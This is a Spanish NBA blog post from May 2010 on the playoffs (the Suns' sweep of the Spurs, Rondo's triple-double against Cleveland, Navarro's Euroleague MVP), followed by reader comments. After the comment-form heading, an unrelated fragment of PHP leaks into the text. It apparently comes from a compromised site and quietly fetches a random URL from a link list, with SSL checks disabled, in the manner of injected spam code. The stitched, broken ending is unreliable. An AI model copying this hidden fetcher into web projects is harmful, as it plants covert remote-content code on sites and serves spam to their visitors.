Playoffs 09/05/2010: El sabor de la venganza

10 de May de 2010 por TheDeerHunter

El destino tenía reservado para los Spurs la fotografía misma de la revancha, ilustrada en la omnipresente sangre de Steve Nash. Como si quisiera evitar que alguien se olvidara de todo lo que allí ha pasado todos estos años. La sangre derramada señala con el dedo a quien la vertió. La imagen, como si de una aparición fantasmagórica se tratara, de otras heridas causadas en otros tiempos. Y uno podría confundirse entre pasado y presente con toda esta macedonia de violencia por el medio. Todo se sucede al mismo tiempo en lustros y en un instante. Una batalla intermitente y discontinua. Lo que ha pasado entre medio apenas nos parece real.

La deuda que hasta el mismo Tony Parker reconoce que el destino tiene con Nash y los suyos y que anoche comenzaba a amortizarse. Con apenas un solo ojo operativo, el ángel vengador guió la mano del base doblemente MVP, para guiar a los suyos en el último cuarto de la victoria decisiva. Aquel que ha barrido a los Spurs ha sido campeón en las últimas décadas. Quizás el baloncesto tiene preparadas algunas cuentas que deben ajustarse. Es casi poético que esta serie haya concluido así.

Y la cosa va de points guards. Nos preguntábamos cómo lograría Boston recuperarse de una paliza como la que recibió el pasado viernes. La respuesta es mediante descaro, inteligencia y, desde luego, coraje. Si escribiéramos esos tres términos en google debería de salir hoy la imagen de Rajon Rondo. No era la noche de aquel legendario “Big Three” en el que él no estaba incluido. Garnett, Ray y Pierce mostraban ciertos signos de impotencia y, por qué no decirlo, de inferioridad. La resistencia de los Celtics tendía a apagarse en el tercer cuarto. Habría sido definitivo. Rondo, sin embargo, de impotencia e inferioridad, ni una pizca. Su gran mérito, además de su propia e indescriptible contribución y de su actitud en los momentos más difíciles, fue encontrar la manera de conectar con los no habituales, Tony Allen y Glen Davis, convirtiéndolos en armas de primera magnitud. Los Cavs tenían todo controlado… menos precisamente lo inesperado. La serie sigue viva en contra de la voluntad del “rey”.

Por último haremos mención al flamante título del Barcelona en la Euroliga y a la gran actuación de “La Bomba” Navarro, que le sirve para ser el primer nacional que logra el MVP de la final. Ejemplo vivo de la falta de vista de algunos dirigentes y técnicos NBA. Estoy seguro de que a alguno de los que todavía sigue vivo en los playoffs les haría un excelente papel. Si Vujacic es mejor que Navarro yo soy Napoleón.

PREMIOS

MVP: ¡Qué barbaridad! Triple doble brutal de Rajon Rondo para doblegar a los teóricamente todopoderosos Cavs. ¡29 puntos, 18 rebotes y 13 asistencias! Hay pívots que no han cogido en su vida semejante cantidad de rebotes…

Sorpresa: Jared Dudley se ha destapado este año como un secundario de lujo durante esta temporada y anoche cuajó un gran partido saliendo desde el banco. 16 puntos, 6 rebotes y 4 asistencias con 6 de 7 en tiros de campo y 3 de 3 en triples.

Decepción: Cuando esta mañana me he enterado de la barrida de los Suns no he podido dar crédito a lo que oía. ¿Alguien había imaginado a los Spurs siendo barridos?

Esfuerzo en vano: Al lado de los números de Rondo, los de LeBron James parecen humanos y eso que hablamos de 22 puntos, 9 rebotes y 8 asistencias.

Y MAÑANA…

Ya acabó una eliminatoria y mañana pueden acabar dos más. Orlando le tiene comida la moral a Atlanta y no se prevé mucha resistencia por parte de los Hawks. Y en Utah habrá que ver si los Jazz se han repuesto del mazazo de la anterior derrota “made in Fisher”.

Comenta

22 comentarios a esta entrada

  1. Maicas dice:
    #1

    Grandisimo blog sobre la NBA!
    Hace mas de un año que sigo dia tras dia esta pagina y realmente las cronicas son de gran calidad y las mas completas que he encontrado en la red.
    Hoy por fin me he decidido a comentar. Espero poder aportar mis humildes conocimientos mas a menudo.
    Enhorabuena a todos los que haceis posible que los aficionados del basket que tanto nos gusta la mejor liga del mundo podamos seguirla. Excelente trabajo el vuestro! Seguid asi!

    Ah! por cierto… soy seguidor de siempre de los Celtics!!!!

      Citar

  2. Love Denise dice:
    #2

    “”Si Vujacic es mejor que Navarro yo soy Napoleón.”” jejje, a lo que yo añadiría, y si Walton es mejor que Mickael yo soy Pepe Botella (el hermano de Napoleón).
    Espero que los Celtics eliminen a Cavs (aunque lo dudo), a pesar del 2-2, me dan miedo los Cavs!!!

      Citar

  3. TheDeerHunter dice:
    #3

    El matiz no me parece válido, LDenise…
    No porque piense que Walton es mejor que Mickeal. Me parece que Mickeal podría ser buena pieza para un banquillo como el de Lakers.

    La diferencia entre una y otra afirmación es que Navarro sí que ha demostrado que podría jugar en la NBA con la gorra y Vujacic muy poquito. En cambio Mickeal no creo que haya demostrado nada en la NBA y en cambio Walton sí lo ha hecho en numerosas ocasiones (incluido en alguna que otra final de la NBA y en partidos decisivos de playoffs) El agravante, además, es que Walton arrastra una lesión muy jodida que no le ha dejado rendir desde hace tiempo.

      Citar

  4. HeiNeKeN dice:
    #4

    El baloncesto le debia un favor a Phoenix y mas concretamente a Nash… ojala se de una final Orlando vs Phoenix…

      Citar

  5. Love Denise dice:
    #5

    Dios te oiga, heineken

      Citar

  6. TheDeerHunter dice:
    #6

    si esto va de lo que le debe el baloncesto a ciertos equipos el anillo tiene que ser nuevamente de Lakers. XD

    No hay ningún equipo que haya perdido tantas finales… algunas de ellas terriblemente dolorosas en 7 partidos (más finales perdidas a 7 partidos que nadie, nuevamente)

    Vayamos afinando las hachas, LDenise… ¿quien haría la previa, tú o yo?

      Citar

  7. mmmm dice:
    #7

    Buah, madre mia Rondo. Ese partido lo hace LeChón y sale en todos los diarios de medio mundo. Tiró del carro él solito.
    En esta serie, a los celtics les faltan 2 cosas que tienen que venir, 1 arbitraje a favor y un buen partido de Pierce. Esperemos que sea en el proximo, partido decisivo a mi juicio.

    Muy bueno lo de los Suns, se lo merecen.

      Citar

  8. Love Denise dice:
    #8

    Alguien sabe por qué no juega Nate robinson? por temas deportivos o extradeportivos?
    Los Celtics han resucitado a Tony Allen, está jugando bien; personalmente, le daría más protagonismo a Glen davis, me parece un jugador bastante válido.

    ¿de que previa me hablas deer? la hacha la tengo afilada desde los malditos triples del bueno de Fisher del año pasado.

      Citar

  9. TheDeerHunter dice:
    #9

    ya te la diré cuando llegue el momento, jojojo

      Citar

  10. sayim dice:
    #10

    Estupendo análisis, como siempre.

    Sobre lo de Navarro, ni una sola duda: Tiene más talento que alguna plantilla nba entera. Creo que también harían un papel muy muy digno en la NBA otros componentes de la plantilla como Vazquez, Rubio o Lorbek.

    A pesar de la opinión más o menos extendida en el blog del mal papel que haría el Barça en la NBA, yo sigo convencido que tocaría PO en la conferencia Este.

    Un saludo

      Citar

  11. sergio dice:
    #11

    El gran problema de Navarro para jugar en la NBA es el fisico. Seguramente la posicion que mejor podria desempeñar es la de base. Un base al estilo Conley, TJ Ford, Fisher (con el nivel defensivo bajo),… No tengo dudas de que es mucho mejor que la mayoria de bases de la liga, pero imagina enfrentandose en estos Playoffs a Deron, Rondo, Rose, Westbrook,.. en partidos en los que la defensa al hombre te puede costar un partido. Yo lo veria como suplente de lujo y revulsivo. Algo asi como Terry para otros equipos.

    Fran Vazquez podria jugar perfectamente en la NBA. Me parece un jugador similar al actual Ibaka. Y lo de Rubio es de traca…

    Me alegro mucho por los Suns a pesar de que los Spurs son uno de mis equipos favoritos. Creia que el sistema de juego de Phoenix podria ayudar ligeramente a los tejanos pero nada mas lejos de la realidad. Si hubiese pensado en una victoria de los soles, no creeria que fuese gracias al magnifico trabajo de los secundarios. Grandisima serie de Dudley, Dragic, Richardson, Hill,….

    Ah! y lo de Rondo tiene coj… Mas que el Big Three y Rondo parece que el base es D’artagnan y los demas los mosqueteros.

      Citar

  12. pcerezo dice:
    #12

    Vaya tela los de los Suns. Me la envaino pero bien. Dudo que alguien haya acertdo la porra. Este 4-0 de los Suns es como si el Barça pierde el domingo con el Valladolid en casa. Menuda barrida con todas las de la ley.
    Me alegro por Nash y por Grant Hill. Reivindicándose. Con calidad, categoria, ganas de ganar, porfesionalidad.
    Pues también me están sorprendiendo los Celtics, pero ya hay mucha gente que lo dice en el blog y lo escribís, están hechos de otra pasta, ese orgullo, como el Madrid, no se rinden nuncan, los tienen que echar a patadas. Impresionante los números de Rondo, en el momento en el que tire bien sera el base perfecto, osea NASH.

    Un saludo,
    Pablo

      Citar

  13. mmmm dice:
    #13

    Rondo tira bien, no perfecto pero ha mejorado muchisimo en los tiros en suspension.

    Y no se te ocurra comparar a los Celtics con el Madrid, por favor…

      Citar

  14. pcerezo dice:
    #14

    mmm, porqué no puedo comparar?

      Citar

  15. TheDeerHunter dice:
    #15

    Sergio… yo no digo que Navarro tuviera que ser necesariamente un super-escolta estrella en la NBA. Digo que demostró que era válido. Que hay jugadores que lo han hecho muy bien con mucho menos físico… y muchos más con menos talento. Incluso hay muchos con menos físico, peor capacidad defensiva, menos talento… y que cobran un buen pastizal por hacer nada.

    Navarro, en la élite del baloncesto FIBA, ha demostrado que es mejor defensor de lo que mucha gente cree. Tan sólo habría que tener un mínimo de visión y de voluntad para ajustar ciertos aspectos defensivos a sus capacidades.

    De todas formas es hablar por hablar. Creo que tal y como le han ido las cosas en Europa no creo que añore demasiado aquello.

      Citar

  16. sergio dice:
    #16

    Para mi la historia de Celtics y Madrid tiene sus similitudes. Establecieron una “dinastía” en la competicion mas importante a nivel de clubs en los comienzos de la misma, contaron durante aquellos entonces con multiples jugadores de los considerados mejores del mundo, su juego siempre ha sido efectista y practico (a veces por encima del espectaculo), han vivido recientemente un resurgir de titulos durante un periodo de 6-7 años, posteriormente a ese periodo han experimentado un bajon de rendimiento que ha ido acompañado de un cambio historico en sus rivales de toda la vida.

    Aparte, esos dos rivales: Lakers y Barça, han cambiado su propia historia ejemplificando un juego espectaculo que ha enamorado a propios y extraños y que, ademas, les ha acercado a la cantidad de titulos de estos lideres por antonomasia.

    No se, encuentro ciertos paralelismos en los que siempre he pensado, pero considero que ni el deporte, ni el sistema de competicion son comparables en uno y otro caso.

      Citar

  17. sergio dice:
    #17

    Estoy de acuerdo Deer con lo que dices pero si no es un jugador clave ni estrella se me hace imposible pensar en ajustes defensivos para minimizar su aportacion defensiva. Este año ha demostrado haber mejorado en tareas defensivas pero no puedo obviar que las zonas menos amplias en el baloncesto FIBA, el predominio de defensas zonales y el “timing” de juego ayudan a la hora de defender.

    Pero aparte de eso… estoy de acuerdo. Muchos peores jugadores han sido, son y seran importantes en la NBA. Y cobrando esos pastizales que comentas

      Citar

  18. TheDeerHunter dice:
    #18

    Sergio… la comparación con Barça y Madrid siempre la he pensado como dices, pero se queda un tanto parcial en algunos aspectos. Para mí, los Lakers pecan de una cierta prepotencia que yo siempre la he relacionado con algunas fases del Real Madrid… y luego diría que lo del fichaje de Shaq, los sueldacos a Kobe, Pau, etc… parecen salidos de la firma de Florentino.

    De Navarro, es cierto lo que comentas de que no podrían haber ajustes de ningún tipo si no es ninguna superestrella. Pero es que es en eso donde veo el error de la mentalidad “usana”. La obsesión por la jerarquía. Es al revés… tienes un tío que puede ser muy válido para ciertos aspectos, ya sea el primero o el último de la plantilla, aprovecha sus virtudes individuales y trata de minimizar sus defectos con el colectivo. Aquí es puro sentido común. Allí no tanto.

      Citar

  19. sergio dice:
    #19

    Comentan en una noticia en NBA.com que solo dos jugadores han hecho unos numeros superiores en los 3 apartados estadisticos a los que hizo Rondo ayer. Uno de ellos fue Chamberlain con ¡¡29 puntos, 36 rebotes y 13 asistencias!!

      Citar

  20. sergio dice:
    #20

    Claro que es parcial… muy parcial diria yo. Solo apuntaba ciertos paralelismos que veia entre ellos. Tambien es cierto que las diferencias pueden ser o son mayores. A eso me referia con que son comparaciones imposibles. Lo de la prepotencia del Madrid es algo reciente desde mi punto de vista… y mira que soy aficionado del Barça…

    En cuanto a lo de Navarro… es que esa es la forma de pensar el juego en la NBA. Los ajustes no se hacen para jugadores “secundarios”. Tambien es logico en defensas individuales, que son las que predominan en el baloncesto americano. De hecho vi a Navarro pasandolo muy mal a la hora de defender a algunos escoltas rivales. Como tambien los vi a ellos pasadonolo igualmente mal a la hora de defender a Navarro en el tiro exterior.

    Siendo Navarro uno de los mejores jugadores que jamas he visto al dar el primer paso a la hora de entrar a canasta… esa es una ventaja que se pierde en la NBA porque no existen los pasos de salida. No vamos a descubrir nada al decir que Navarro es un genio pero creo que el sistema de juego no le conviene demasiado. Como dice el refran… antes cabeza de raton que cola de leon

      Citar

  21. Marcaco dice:
    #21

    Rondo haciendo un rondo con cavaliers enmedio jojojojo
    Aun así gane quien gane se las tendra q ver cn unos magics descansados…
    Epic game el del sabado de Lakers y Utah, esos 2 ultimos cuartos fueron brutales… Muy mágico el duelo Artest- Korver (xq a un korver tan inspirado no le dejan tirar mas? y xq no le dan la ultima bola? )

    Conclusión, Lakers for the win!!!

    PD: Me cae muy mal lebron, pero ansio que elimine a celtics

      Citar

  22. Tobal dice:
    #22

    Me alegro mucho que los Suns esten en la final de conferencia oeste,en los últimos años ha sido el equipo que mejor basket ha realizado,se lo merecen y pueden dar algún susto todavia este año.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>